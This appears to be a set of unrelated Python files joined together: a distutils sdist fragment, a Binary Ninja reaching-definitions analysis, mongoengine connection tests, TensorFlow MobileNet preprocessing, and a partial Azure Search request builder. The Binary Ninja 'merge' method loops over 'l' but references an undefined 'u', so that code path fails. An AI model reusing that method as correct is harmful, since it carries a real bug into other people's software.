if os.path.isfile(self.manifest):
fp = open(self.manifest)
try:
first_line = fp.readline()
finally:
fp.close()
if first_line != '# file GENERATED by distutils, do NOT edit\n':
log.info("not writing to manually maintained manifest file '%s'" % self.manifest)
return
content = self.filelist.files[:]
content.insert(0, '# file GENERATED by distutils, do NOT edit')
self.execute(file_util.write_file, (self.manifest, content), "writing manifest file '%s'" % self.manifest)
def read_manifest(self):
"""Read the manifest file (named by 'self.manifest') and use it to
fill in 'self.filelist', the list of files to include in the source
distribution.
"""
log.info("reading manifest file '%s'", self.manifest)
manifest = open(self.manifest)
while 1:
line = manifest.readline()
if line == '':
break
if line[-1] == '\n':
line = line[0:-1]
self.filelist.append(line)
manifest.close()
def make_release_tree(self, base_dir, files):
"""Create the directory tree that will become the source
distribution archive. All directories implied by the filenames in
'files' are created under 'base_dir', and then we hard link or copy
(if hard linking is unavailable) those files into place.
Essentially, this duplicates the developer's source tree, but in a
directory named after the distribution, containing only the files
to be distributed.
"""
self.mkpath(base_dir)
dir_util.create_tree(base_dir, files, dry_run=self.dry_run)
if hasattr(os, 'link'):
link = 'hard'
msg = 'making hard links in %s...' % base_dir
else:
link = None
msg = 'copying files to %s...' % base_dir
if not files:
log.warn('no files to distribute -- empty manifest?')
else:
log.info(msg)
for file in files:
if not os.path.isfile(file):
log.warn("'%s' not a regular file -- skipping" % file)
else:
dest = os.path.join(base_dir, file)
self.copy_file(file, dest, link=link)
self.distribution.metadata.write_pkg_info(base_dir)
return
def make_distribution(self):
"""Create the source distribution(s). First, we create the release
tree with 'make_release_tree()'; then, we create all required
archive files (according to 'self.formats') from the release tree.
Finally, we clean up by blowing away the release tree (unless
'self.keep_temp' is true). The list of archive files created is
stored so it can be retrieved later by 'get_archive_files()'.
"""
base_dir = self.distribution.get_fullname()
base_name = os.path.join(self.dist_dir, base_dir)
self.make_release_tree(base_dir, self.filelist.files)
archive_files = []
if 'tar' in self.formats:
self.formats.append(self.formats.pop(self.formats.index('tar')))
for fmt in self.formats:
file = self.make_archive(base_name, fmt, base_dir=base_dir, owner=self.owner, group=self.group)
archive_files.append(file)
self.distribution.dist_files.append(('sdist', '', file))
self.archive_files = archive_files
if not self.keep_temp:
dir_util.remove_tree(base_dir, dry_run=self.dry_run)
def get_archive_files(self):
"""Return the list of archive files created when the command
was run, or None if the command hasn't run yet.
"""
return self.archive_files
|
|
import analysis
import copy
from binaryninja import *
'''
We will track the state of each instruction, where the state will be the
definitions of all live variables at the conclusion of the execution of the
instruction.
There can be only one live instance of an instruction at the conclusion of an
instruction, though there can be multiple live instances of an instruction prior
to the execution of an instruction.
'''
class Variable :
def __init__ (self, name, address=None) :
self.address = address
self.name = name
def __eq__ (self, other) :
if isinstance(other, Variable) :
if self.address == other.address and self.name == other.name :
return True
return False
def __ne__ (self, other) :
return not self.__eq__(other)
def __hash__ (self) :
if self.address == None :
return self.name.__hash__()
return (self.name.__hash__() << 32) + self.address
def __repr__ (self) :
if self.address == None :
return '(%s@not_live)' % (self.name)
return '(%s@%s)' % (self.name, hex(self.address))
class ReachingDefinition :
def __init__ (self, llil, live=[]) :
self.address = llil.address
self.live = live
self.used = []
self.defined = []
def set_live (self, live) :
self.live = live
def set_used (self, used) :
self.used = []
'''
When setting used variables, we check to see if they are live, and if
they are we create a used instance for each live instance
'''
for u in used :
is_live = False
for l in self.live :
if u.name == l.name :
is_live = True
self.used.append(copy.deepcopy(l))
if not is_live :
self.used.append(copy.deepcopy(u))
def add_defined (self, defined) :
'''
Takes a single Variable instance, removes all prior instances of this
variable from live, then adds it to both live and defined
'''
i = 0
while i < len(self.live) :
if self.live[i].name == defined.name :
del self.live[i]
else :
i += 1
self.live.append(copy.deepcopy(defined))
self.defined.append(copy.deepcopy(defined))
def set_defined (self, defined) :
'''
Takes a list of defined Variable instances and calls self.add_defined
over them
'''
for d in defined :
self.add_defined(d)
def merge (self, other) :
'''
Used to merge results from multiple expressions in the same instruction
'''
if other == None :
return
for l in other.live :
if l not in self.live :
self.live.append(copy.deepcopy(l))
for l in other.used :
if u not in self.used :
self.used.append(copy.deepcopy(u))
for d in other.defined :
if d not in self.defined :
self.add_defined(d)
def __eq__ (self, other) :
if other == None :
return False
if set(self.live) != set(other.live) :
print 'live_diff', self.live, other.live
return False
elif set(self.used) != set(other.used) :
print 'used_diff', self.used, other.used
return False
elif set(self.defined) != set(other.defined) :
print 'defined_diff', self.defined, other.defined
return False
return True
def __ne__ (self, other) :
return not self.__eq__(other)
class ReachingDefinitions (analysis.AnalysisModel) :
def __init__ (self, llil_instructions_graph, bv) :
super(ReachingDefinitions, self).__init__()
self.llil_handler_print = True
self.bv = bv
'''
Mapping of addresses to RDInstruction
'''
self.defs = {}
self.definitions = self.fixpoint_forward(llil_instructions_graph)
def prepare_op (self, llil, data) :
reachingDefinition = ReachingDefinition(llil)
if data != None :
reachingDefinition.set_live(data.live)
return reachingDefinition
def join_lhs_rhs (self, llil, lhs, rhs) :
reachingDefinition = ReachingDefinition(llil)
reachingDefinition.set_live(copy.deepcopy(lhs.live))
for l in rhs.live :
if l not in reachingDefinition.live :
reachingDefinition.live.append(copy.deepcopy(l))
return reachingDefinition
def state_equivalence_lhs_rhs (self, lhs, rhs) :
# We will compare keys between RDInstruction states first
if set(lhs.keys()) != set(rhs.keys()) :
return False
# Now we will compare the values of all variables in each state
for key in lhs :
if set(lhs[key]) != set(rhs[key]) :
return False
return True
def reg_name (self, reg_name) :
return self.bv.arch.regs[reg_name].full_width_reg
def _arith (self, llil, data=None) :
if self.llil_handler_print :
print ' _arith', llil
lhs = self.optable[llil.left.operation](llil.left, data)
rhs = self.optable[llil.right.operation](llil.right, data)
definitions = lhs + rhs
return definitions
def _add (self, llil, data=None) :
if self.llil_handler_print :
print ' _add', llil
lhs = self.optable[llil.left.operation](llil.left, data)
rhs = self.optable[llil.right.operation](llil.right, data)
if len(lhs) == 1 and \
lhs[0].name == self.bv.arch.stack_pointer and \
llil.right.operation == LowLevelILOperation.LLIL_CONST :
function = self.bv.get_basic_blocks_at(llil.address)[0].function
addend = function.get_reg_value_at(llil.address, self.bv.arch.stack_pointer).offset
addend += llil.right.value
return [Variable('var_0x%0X' % (addend), llil.address)]
return lhs + rhs
def _arith_db (self, llil, data=None) :
if self.llil_handler_print :
print ' UNHANDLED _arith_dp', llil
log.log_warn(' UNHANDLED _arith_dp')
def _unary (self, llil, data=None) :
if self.llil_handler_print :
print ' _unary', llil
reachingDefinition = self.prepare_op(llil.src, data)
reachingDefinition.set_used(self.recursive_op(llil.src))
defined = [Variable(self.reg_name(llil.dest), llil.address)]
reachingDefinition.set_defined(defined)
return reachingDefinition
def _set_flag (self, llil, data=None) :
if self.llil_handler_print :
print ' _set_flag', llil
reachingDefinition = self.prepare_op(llil.src, data)
reachingDefinition.set_used(self.recursive_op(llil.src))
defined = [Variable(llil.dest, llil.address)]
reachingDefinition.set_defined(defined)
return reachingDefinition
def _set_reg (self, llil, data=None) :
if self.llil_handler_print :
print ' _set_reg', llil
reachingDefinition = self.prepare_op(llil, data)
reachingDefinition.set_used(self.recursive_op(llil.src))
defined = [Variable(self.reg_name(llil.dest), llil.address)]
reachingDefinition.set_defined(defined)
return reachingDefinition
def _cmp (self, llil, data=None) :
if self.llil_handler_print :
print ' _cmp', llil
variables = self.recursive_op(llil.left)
variables += self.recursive_op(llil.right)
return variables
def _reg (self, llil, data=None) :
return [Variable(self.reg_name(llil.src))]
def _const (self, llil, data=None) :
return []
def _flag_cond (self, llil, data=None) :
if self.llil_handler_print :
print ' UNHANDLED _flag_cond', llil
log.log_warn(' UNHANDLED _flag_conf')
def _flag (self, llil, data=None) :
if self.llil_handler_print :
print ' _flag'
return [Variable(llil.src)]
def _load (self, llil, data=None) :
if self.llil_handler_print :
print ' _load', llil
return self.recursive_op(llil.src)
def _store (self, llil, data=None) :
reachingDefinition = self.prepare_op(llil, data)
if self.llil_handler_print :
print ' _store', llil
variables = self.recursive_op(llil.dest)
variables += self.recursive_op(llil.src)
reachingDefinition.set_used(variables)
return reachingDefinition
def _push (self, llil, data=None) :
if self.llil_handler_print :
print ' _push',
reachingDefinition = self.prepare_op(llil, data)
reachingDefinition.set_used(self.recursive_op(llil.src))
return reachingDefinition
def _pop (self, llil, data=None) :
if self.llil_handler_print :
print ' _pop', llil
return [] # looks like pop is a rhs
def _noret (self, llil, data=None) :
if self.llil_handler_print :
print ' UNHANDLED _noret', llil
def _goto (self, llil, data=None) :
if self.llil_handler_print :
print ' _goto', llil
return self.prepare_op(llil, data)
def _If (self, llil, data=None) :
if self.llil_handler_print :
print ' _If', llil
reachingDefinition = self.prepare_op(llil, data)
log.log_info(llil.condition)
log.log_info(self.recursive_op(llil.condition))
reachingDefinition.set_used(self.recursive_op(llil.condition))
return reachingDefinition
def _bool_to_int (self, llil, data=None) :
if self.llil_handler_print :
print ' UNHANDLED _bool_to_int', llil
def _jump (self, llil, data=None) :
if self.llil_handler_print :
print ' _jump', llil
return self.prepare_op(llil, data)
def _jump_to (self, llil, data=None) :
if self.llil_handler_print :
print ' _jump_to', llil
return self.prepare_op(llil, data)
def _call (self, llil, data=None) :
if self.llil_handler_print :
print ' _call'
reachingDefinition = self.prepare_op(llil, data)
reachingDefinition.set_used(self.recursive_op(llil.dest))
if self.bv.arch.name == 'armv7' :
reachingDefinition.set_defined([Variable('r3', llil.address)])
return reachingDefinition
def _ret (self, llil, data=None) :
if self.llil_handler_print :
print ' _ret', llil
return None # No need to return anything here
def _test_bit (self, llil, data=None) :
if self.llil_handler_print :
print ' UNHANDLED _test_bit', llil
log.log_warn(' UNHANDLED _test_bit')
def _syscall (self, llil, data=None) :
if self.llil_handler_print :
print ' UNHANDLED _syscall', llil
log.log_warn(' UNHANDLED _syscall')
def _bp (self, llil, data=None) :
if self.llil_handler_print :
print ' UNHANDLED _bp', llil
log.log_warn(' UNHANDLED _bp')
def _trap (self, llil, data=None) :
if self.llil_handler_print :
print ' UNHANDLED _trap', llil
log.log_warn(' UNHANDLED _trap')
def _undef (self, llil, data=None) :
if self.llil_handler_print :
print ' UNHANDLED _undef', llil
log.log_warn(' UNHANDLED _undef')
def _unimpl (self, llil, data=None) :
if self.llil_handler_print :
print ' UNHANDLED _unimpl'
log.log_warn(' UNHANDLED _unimpl')
def _unimpl_mem (self, llil, data=None) :
if self.llil_handler_print :
print ' UNHANDLED _unimpl_mem'
log.log_warn(' UNHANDLED _unimpl_mem')
|
|
import sys
import datetime
from pymongo.errors import OperationFailure
sys.path[0:0] = [""]
try:
import unittest2 as unittest
except ImportError:
import unittest
import pymongo
from bson.tz_util import utc
from mongoengine import (
connect, register_connection,
Document, DateTimeField
)
from mongoengine.python_support import IS_PYMONGO_3
import mongoengine.connection
from mongoengine.connection import get_db, get_connection, ConnectionError
def get_tz_awareness(connection):
if not IS_PYMONGO_3:
return connection.tz_aware
else:
return connection.codec_options.tz_aware
class ConnectionTest(unittest.TestCase):
def tearDown(self):
mongoengine.connection._connection_settings = {}
mongoengine.connection._connections = {}
mongoengine.connection._dbs = {}
def test_connect(self):
"""Ensure that the connect() method works properly.
"""
connect('mongoenginetest')
conn = get_connection()
self.assertTrue(isinstance(conn, pymongo.mongo_client.MongoClient))
db = get_db()
self.assertTrue(isinstance(db, pymongo.database.Database))
self.assertEqual(db.name, 'mongoenginetest')
connect('mongoenginetest2', alias='testdb')
conn = get_connection('testdb')
self.assertTrue(isinstance(conn, pymongo.mongo_client.MongoClient))
def test_disconnect(self):
"""Ensure that the disconnect() method works properly
"""
conn1 = connect('mongoenginetest')
mongoengine.connection.disconnect()
conn2 = connect('mongoenginetest')
self.assertTrue(conn1 is not conn2)
def test_sharing_connections(self):
"""Ensure that connections are shared when the connection settings are exactly the same
"""
connect('mongoenginetests', alias='testdb1')
expected_connection = get_connection('testdb1')
connect('mongoenginetests', alias='testdb2')
actual_connection = get_connection('testdb2')
# Handle PyMongo 3+ Async Connection
if IS_PYMONGO_3:
# Ensure we are connected, throws ServerSelectionTimeoutError otherwise.
# Purposely not catching exception to fail test if thrown.
expected_connection.server_info()
self.assertEqual(expected_connection, actual_connection)
def test_connect_uri(self):
"""Ensure that the connect() method works properly with uri's
"""
c = connect(db='mongoenginetest', alias='admin')
c.admin.system.users.remove({})
c.mongoenginetest.system.users.remove({})
c.admin.add_user("admin", "password")
c.admin.authenticate("admin", "password")
c.mongoenginetest.add_user("username", "password")
if not IS_PYMONGO_3:
self.assertRaises(ConnectionError, connect, "testdb_uri_bad", host='mongodb://test:password@localhost')
connect("testdb_uri", host='mongodb://username:password@localhost/mongoenginetest')
conn = get_connection()
self.assertTrue(isinstance(conn, pymongo.mongo_client.MongoClient))
db = get_db()
self.assertTrue(isinstance(db, pymongo.database.Database))
self.assertEqual(db.name, 'mongoenginetest')
c.admin.system.users.remove({})
c.mongoenginetest.system.users.remove({})
def test_connect_uri_without_db(self):
"""Ensure connect() method works properly with uri's without database_name
"""
c = connect(db='mongoenginetest', alias='admin')
c.admin.system.users.remove({})
c.mongoenginetest.system.users.remove({})
c.admin.add_user("admin", "password")
c.admin.authenticate("admin", "password")
c.mongoenginetest.add_user("username", "password")
if not IS_PYMONGO_3:
self.assertRaises(ConnectionError, connect, "testdb_uri_bad", host='mongodb://test:password@localhost')
connect("mongoenginetest", host='mongodb://localhost/')
conn = get_connection()
self.assertTrue(isinstance(conn, pymongo.mongo_client.MongoClient))
db = get_db()
self.assertTrue(isinstance(db, pymongo.database.Database))
self.assertEqual(db.name, 'mongoenginetest')
c.admin.system.users.remove({})
c.mongoenginetest.system.users.remove({})
def test_connect_uri_with_authsource(self):
"""Ensure that the connect() method works well with
the option `authSource` in URI.
This feature was introduced in MongoDB 2.4 and removed in 2.6
"""
# Create users
c = connect('mongoenginetest')
c.admin.system.users.remove({})
c.admin.add_user('username2', 'password')
# Authentication fails without "authSource"
if IS_PYMONGO_3:
test_conn = connect('mongoenginetest', alias='test1',
host='mongodb://username2:password@localhost/mongoenginetest')
self.assertRaises(OperationFailure, test_conn.server_info)
else:
self.assertRaises(
ConnectionError, connect, 'mongoenginetest', alias='test1',
host='mongodb://username2:password@localhost/mongoenginetest'
)
self.assertRaises(ConnectionError, get_db, 'test1')
# Authentication succeeds with "authSource"
test_conn2 = connect(
'mongoenginetest', alias='test2',
host=('mongodb://username2:password@localhost/'
'mongoenginetest?authSource=admin')
)
# This will fail starting from MongoDB 2.6+
db = get_db('test2')
self.assertTrue(isinstance(db, pymongo.database.Database))
self.assertEqual(db.name, 'mongoenginetest')
# Clear all users
c.admin.system.users.remove({})
def test_register_connection(self):
"""Ensure that connections with different aliases may be registered.
"""
register_connection('testdb', 'mongoenginetest2')
self.assertRaises(ConnectionError, get_connection)
conn = get_connection('testdb')
self.assertTrue(isinstance(conn, pymongo.mongo_client.MongoClient))
db = get_db('testdb')
self.assertTrue(isinstance(db, pymongo.database.Database))
self.assertEqual(db.name, 'mongoenginetest2')
def test_register_connection_defaults(self):
"""Ensure that defaults are used when the host and port are None.
"""
register_connection('testdb', 'mongoenginetest', host=None, port=None)
conn = get_connection('testdb')
self.assertTrue(isinstance(conn, pymongo.mongo_client.MongoClient))
def test_connection_kwargs(self):
"""Ensure that connection kwargs get passed to pymongo.
"""
connect('mongoenginetest', alias='t1', tz_aware=True)
conn = get_connection('t1')
self.assertTrue(get_tz_awareness(conn))
connect('mongoenginetest2', alias='t2')
conn = get_connection('t2')
self.assertFalse(get_tz_awareness(conn))
def test_datetime(self):
connect('mongoenginetest', tz_aware=True)
d = datetime.datetime(2010, 5, 5, tzinfo=utc)
class DateDoc(Document):
the_date = DateTimeField(required=True)
DateDoc.drop_collection()
DateDoc(the_date=d).save()
date_doc = DateDoc.objects.first()
self.assertEqual(d, date_doc.the_date)
def test_multiple_connection_settings(self):
connect('mongoenginetest', alias='t1', host="localhost")
connect('mongoenginetest2', alias='t2', host="127.0.0.1")
mongo_connections = mongoengine.connection._connections
self.assertEqual(len(mongo_connections.items()), 2)
self.assertTrue('t1' in mongo_connections.keys())
self.assertTrue('t2' in mongo_connections.keys())
if not IS_PYMONGO_3:
self.assertEqual(mongo_connections['t1'].host, 'localhost')
self.assertEqual(mongo_connections['t2'].host, '127.0.0.1')
else:
# Handle PyMongo 3+ Async Connection
# Ensure we are connected, throws ServerSelectionTimeoutError otherwise.
# Purposely not catching exception to fail test if thrown.
mongo_connections['t1'].server_info()
mongo_connections['t2'].server_info()
self.assertEqual(mongo_connections['t1'].address[0], 'localhost')
self.assertEqual(mongo_connections['t2'].address[0], '127.0.0.1')
if __name__ == '__main__':
unittest.main()
|
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Provides utilities to preprocess images for the MobileNet networks."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from tensorflow.python.ops import control_flow_ops
def apply_with_random_selector(x, func, num_cases):
"""Computes func(x, sel), with sel sampled from [0...num_cases-1].
Args:
x: input Tensor.
func: Python function to apply.
num_cases: Python int32, number of cases to sample sel from.
Returns:
The result of func(x, sel), where func receives the value of the
selector as a python integer, but sel is sampled dynamically.
"""
sel = tf.random_uniform([], maxval=num_cases, dtype=tf.int32)
# Pass the real x only to one of the func calls.
return control_flow_ops.merge([
func(control_flow_ops.switch(x, tf.equal(sel, case))[1], case)
for case in range(num_cases)])[0]
def distort_color(image, color_ordering=0, fast_mode=True, scope=None):
"""Distort the color of a Tensor image.
Each color distortion is non-commutative and thus ordering of the color ops
matters. Ideally we would randomly permute the ordering of the color ops.
Rather then adding that level of complication, we select a distinct ordering
of color ops for each preprocessing thread.
Args:
image: 3-D Tensor containing single image in [0, 1].
color_ordering: Python int, a type of distortion (valid values: 0-3).
fast_mode: Avoids slower ops (random_hue and random_contrast)
scope: Optional scope for name_scope.
Returns:
3-D Tensor color-distorted image on range [0, 1]
Raises:
ValueError: if color_ordering not in [0, 3]
"""
with tf.name_scope(scope, 'distort_color', [image]):
if fast_mode:
if color_ordering == 0:
image = tf.image.random_brightness(image, max_delta=32. / 255.)
image = tf.image.random_saturation(image, lower=0.5, upper=1.5)
else:
image = tf.image.random_saturation(image, lower=0.5, upper=1.5)
image = tf.image.random_brightness(image, max_delta=32. / 255.)
else:
if color_ordering == 0:
image = tf.image.random_brightness(image, max_delta=32. / 255.)
image = tf.image.random_saturation(image, lower=0.5, upper=1.5)
image = tf.image.random_hue(image, max_delta=0.2)
image = tf.image.random_contrast(image, lower=0.5, upper=1.5)
elif color_ordering == 1:
image = tf.image.random_saturation(image, lower=0.5, upper=1.5)
image = tf.image.random_brightness(image, max_delta=32. / 255.)
image = tf.image.random_contrast(image, lower=0.5, upper=1.5)
image = tf.image.random_hue(image, max_delta=0.2)
elif color_ordering == 2:
image = tf.image.random_contrast(image, lower=0.5, upper=1.5)
image = tf.image.random_hue(image, max_delta=0.2)
image = tf.image.random_brightness(image, max_delta=32. / 255.)
image = tf.image.random_saturation(image, lower=0.5, upper=1.5)
elif color_ordering == 3:
image = tf.image.random_hue(image, max_delta=0.2)
image = tf.image.random_saturation(image, lower=0.5, upper=1.5)
image = tf.image.random_contrast(image, lower=0.5, upper=1.5)
image = tf.image.random_brightness(image, max_delta=32. / 255.)
else:
raise ValueError('color_ordering must be in [0, 3]')
# The random_* ops do not necessarily clamp.
return tf.clip_by_value(image, 0.0, 1.0)
def distorted_bounding_box_crop(image,
bbox,
min_object_covered=0.1,
aspect_ratio_range=(0.75, 1.33),
area_range=(0.05, 1.0),
max_attempts=100,
scope=None):
"""Generates cropped_image using a one of the bboxes randomly distorted.
See `tf.image.sample_distorted_bounding_box` for more documentation.
Args:
image: 3-D Tensor of image (it will be converted to floats in [0, 1]).
bbox: 3-D float Tensor of bounding boxes arranged [1, num_boxes, coords]
where each coordinate is [0, 1) and the coordinates are arranged
as [ymin, xmin, ymax, xmax]. If num_boxes is 0 then it would use the whole
image.
min_object_covered: An optional `float`. Defaults to `0.1`. The cropped
area of the image must contain at least this fraction of any bounding box
supplied.
aspect_ratio_range: An optional list of `floats`. The cropped area of the
image must have an aspect ratio = width / height within this range.
area_range: An optional list of `floats`. The cropped area of the image
must contain a fraction of the supplied image within in this range.
max_attempts: An optional `int`. Number of attempts at generating a cropped
region of the image of the specified constraints. After `max_attempts`
failures, return the entire image.
scope: Optional scope for name_scope.
Returns:
A tuple, a 3-D Tensor cropped_image and the distorted bbox
"""
with tf.name_scope(scope, 'distorted_bounding_box_crop', [image, bbox]):
# Each bounding box has shape [1, num_boxes, box coords] and
# the coordinates are ordered [ymin, xmin, ymax, xmax].
# A large fraction of image datasets contain a human-annotated bounding
# box delineating the region of the image containing the object of interest.
# We choose to create a new bounding box for the object which is a randomly
# distorted version of the human-annotated bounding box that obeys an
# allowed range of aspect ratios, sizes and overlap with the human-annotated
# bounding box. If no box is supplied, then we assume the bounding box is
# the entire image.
sample_distorted_bounding_box = tf.image.sample_distorted_bounding_box(
tf.shape(image),
bounding_boxes=bbox,
min_object_covered=min_object_covered,
aspect_ratio_range=aspect_ratio_range,
area_range=area_range,
max_attempts=max_attempts,
use_image_if_no_bounding_boxes=True)
bbox_begin, bbox_size, distort_bbox = sample_distorted_bounding_box
# Crop the image to the specified bounding box.
cropped_image = tf.slice(image, bbox_begin, bbox_size)
return cropped_image, distort_bbox
def preprocess_for_train(image, height, width, bbox,
fast_mode=True,
scope=None):
"""Distort one image for training a network.
Distorting images provides a useful technique for augmenting the data
set during training in order to make the network invariant to aspects
of the image that do not effect the label.
Additionally it would create image_summaries to display the different
transformations applied to the image.
Args:
image: 3-D Tensor of image. If dtype is tf.float32 then the range should be
[0, 1], otherwise it would converted to tf.float32 assuming that the range
is [0, MAX], where MAX is largest positive representable number for
int(8/16/32) data type (see `tf.image.convert_image_dtype` for details).
height: integer
width: integer
bbox: 3-D float Tensor of bounding boxes arranged [1, num_boxes, coords]
where each coordinate is [0, 1) and the coordinates are arranged
as [ymin, xmin, ymax, xmax].
fast_mode: Optional boolean, if True avoids slower transformations (i.e.
bi-cubic resizing, random_hue or random_contrast).
scope: Optional scope for name_scope.
Returns:
3-D float Tensor of distorted image used for training with range [-1, 1].
"""
with tf.name_scope(scope, 'distort_image', [image, height, width, bbox]):
if bbox is None:
bbox = tf.constant([0.0, 0.0, 1.0, 1.0],
dtype=tf.float32,
shape=[1, 1, 4])
if image.dtype != tf.float32:
image = tf.image.convert_image_dtype(image, dtype=tf.float32)
# Each bounding box has shape [1, num_boxes, box coords] and
# the coordinates are ordered [ymin, xmin, ymax, xmax].
image_with_box = tf.image.draw_bounding_boxes(tf.expand_dims(image, 0),
bbox)
tf.summary.image('image_with_bounding_boxes', image_with_box)
distorted_image, distorted_bbox = distorted_bounding_box_crop(image, bbox)
# Restore the shape since the dynamic slice based upon the bbox_size loses
# the third dimension.
distorted_image.set_shape([None, None, 3])
image_with_distorted_box = tf.image.draw_bounding_boxes(
tf.expand_dims(image, 0), distorted_bbox)
tf.summary.image('images_with_distorted_bounding_box',
image_with_distorted_box)
# This resizing operation may distort the images because the aspect
# ratio is not respected. We select a resize method in a round robin
# fashion based on the thread number.
# Note that ResizeMethod contains 4 enumerated resizing methods.
# We select only 1 case for fast_mode bilinear.
num_resize_cases = 1 if fast_mode else 4
distorted_image = apply_with_random_selector(
distorted_image,
lambda x, method: tf.image.resize_images(x, [height, width], method=method),
num_cases=num_resize_cases)
tf.summary.image('cropped_resized_image',
tf.expand_dims(distorted_image, 0))
# Randomly flip the image horizontally.
distorted_image = tf.image.random_flip_left_right(distorted_image)
# Randomly distort the colors. There are 4 ways to do it.
distorted_image = apply_with_random_selector(
distorted_image,
lambda x, ordering: distort_color(x, ordering, fast_mode),
num_cases=4)
tf.summary.image('final_distorted_image',
tf.expand_dims(distorted_image, 0))
distorted_image = tf.subtract(distorted_image, 0.5)
distorted_image = tf.multiply(distorted_image, 2.0)
return distorted_image
def preprocess_for_eval(image, height, width,
central_fraction=0.875, scope=None):
"""Prepare one image for evaluation.
If height and width are specified it would output an image with that size by
applying resize_bilinear.
If central_fraction is specified it would cropt the central fraction of the
input image.
Args:
image: 3-D Tensor of image. If dtype is tf.float32 then the range should be
[0, 1], otherwise it would converted to tf.float32 assuming that the range
is [0, MAX], where MAX is largest positive representable number for
int(8/16/32) data type (see `tf.image.convert_image_dtype` for details)
height: integer
width: integer
central_fraction: Optional Float, fraction of the image to crop.
scope: Optional scope for name_scope.
Returns:
3-D float Tensor of prepared image.
"""
with tf.name_scope(scope, 'eval_image', [image, height, width]):
if image.dtype != tf.float32:
image = tf.image.convert_image_dtype(image, dtype=tf.float32)
# Crop the central region of the image with an area containing 87.5% of
# the original image.
if central_fraction:
image = tf.image.central_crop(image, central_fraction=central_fraction)
if height and width:
# Resize the image to the specified height and width.
image = tf.expand_dims(image, 0)
image = tf.image.resize_bilinear(image, [height, width],
align_corners=False)
image = tf.squeeze(image, [0])
image = tf.subtract(image, 0.5)
image = tf.multiply(image, 2.0)
return image
def preprocess_image(image, height, width,
is_training=False,
bbox=None,
fast_mode=True):
"""Pre-process one image for training or evaluation.
Args:
image: 3-D Tensor [height, width, channels] with the image.
height: integer, image expected height.
width: integer, image expected width.
is_training: Boolean. If true it would transform an image for train,
otherwise it would transform it for evaluation.
bbox: 3-D float Tensor of bounding boxes arranged [1, num_boxes, coords]
where each coordinate is [0, 1) and the coordinates are arranged as
[ymin, xmin, ymax, xmax].
fast_mode: Optional boolean, if True avoids slower transformations.
Returns:
3-D float Tensor containing an appropriately scaled image
Raises:
ValueError: if user does not provide bounding box
"""
if is_training:
return preprocess_for_train(image, height, width, bbox, fast_mode)
else:
return preprocess_for_eval(image, height, width)
|
|
# pylint: disable=too-many-lines
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
from msrest import Serializer
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from .. import models as _models
from .._vendor import _convert_request, _format_url_section
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Optional, TypeVar
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
_SERIALIZER = Serializer()
_SERIALIZER.client_side_validation = False
# fmt: off
def build_create_or_update_request(
synonym_map_name, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
prefer = kwargs.pop('prefer', "return=representation") # type: str
api_version = kwargs.pop('api_version', "2021-04-30-Preview") # type: str
content_type = kwargs.pop('content_type', None) # type: Optional[str]
x_ms_client_request_id = kwargs.pop('x_ms_client_request_id', None) # type: Optional[str]
if_match = kwargs.pop('if_match', None) # type: Optional[str]
if_none_match = kwargs.pop('if_none_match', None) # type: Optional[str]
accept = "application/json"
# Construct URL
_url = kwargs.pop("template_url", "/synonymmaps(\'{synonymMapName}\')")
path_format_arguments = {
"synonymMapName": _SERIALIZER.url("synonym_map_name", synonym_map_name, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
_query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
if x_ms_client_request_id is not None:
_header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("x_ms_client_request_id", x_ms_client_request_id, 'str')
if if_match is not None:
_header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str')
if if_none_match is not None:
_header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str')
_header_parameters['Prefer'] = _SERIALIZER.header("prefer", prefer, 'str')
if content_type is not None:
_header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
_header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="PUT",
url=_url,
params=_query_parameters,
headers=_header_parameters,
**kwargs
)
def build_delete_request(
synonym_map_name, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = kwargs.pop('api_version', "2021-04-30-Preview") # type: str
x_ms_client_request_id = kwargs.pop('x_ms_client_request_id', None) # type: Optional[str]
if_match = kwargs.pop('if_match', None) # type: Optional[str]
if_none_match = kwargs.pop('if_none_match', None) # type: Optional[str]
accept = "application/json"
# Construct URL
_url = kwargs.pop("template_url", "/synonymmaps(\'{synonymMapName}\')")
path_format_arguments = {
"synonymMapName": _SERIALIZER.url("synonym_map_name", synonym_map_name, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
_query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
if x_ms_client_request_id is not None:
_header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("x_ms_client_request_id", x_ms_client_request_id, 'str')
if if_match is not None:
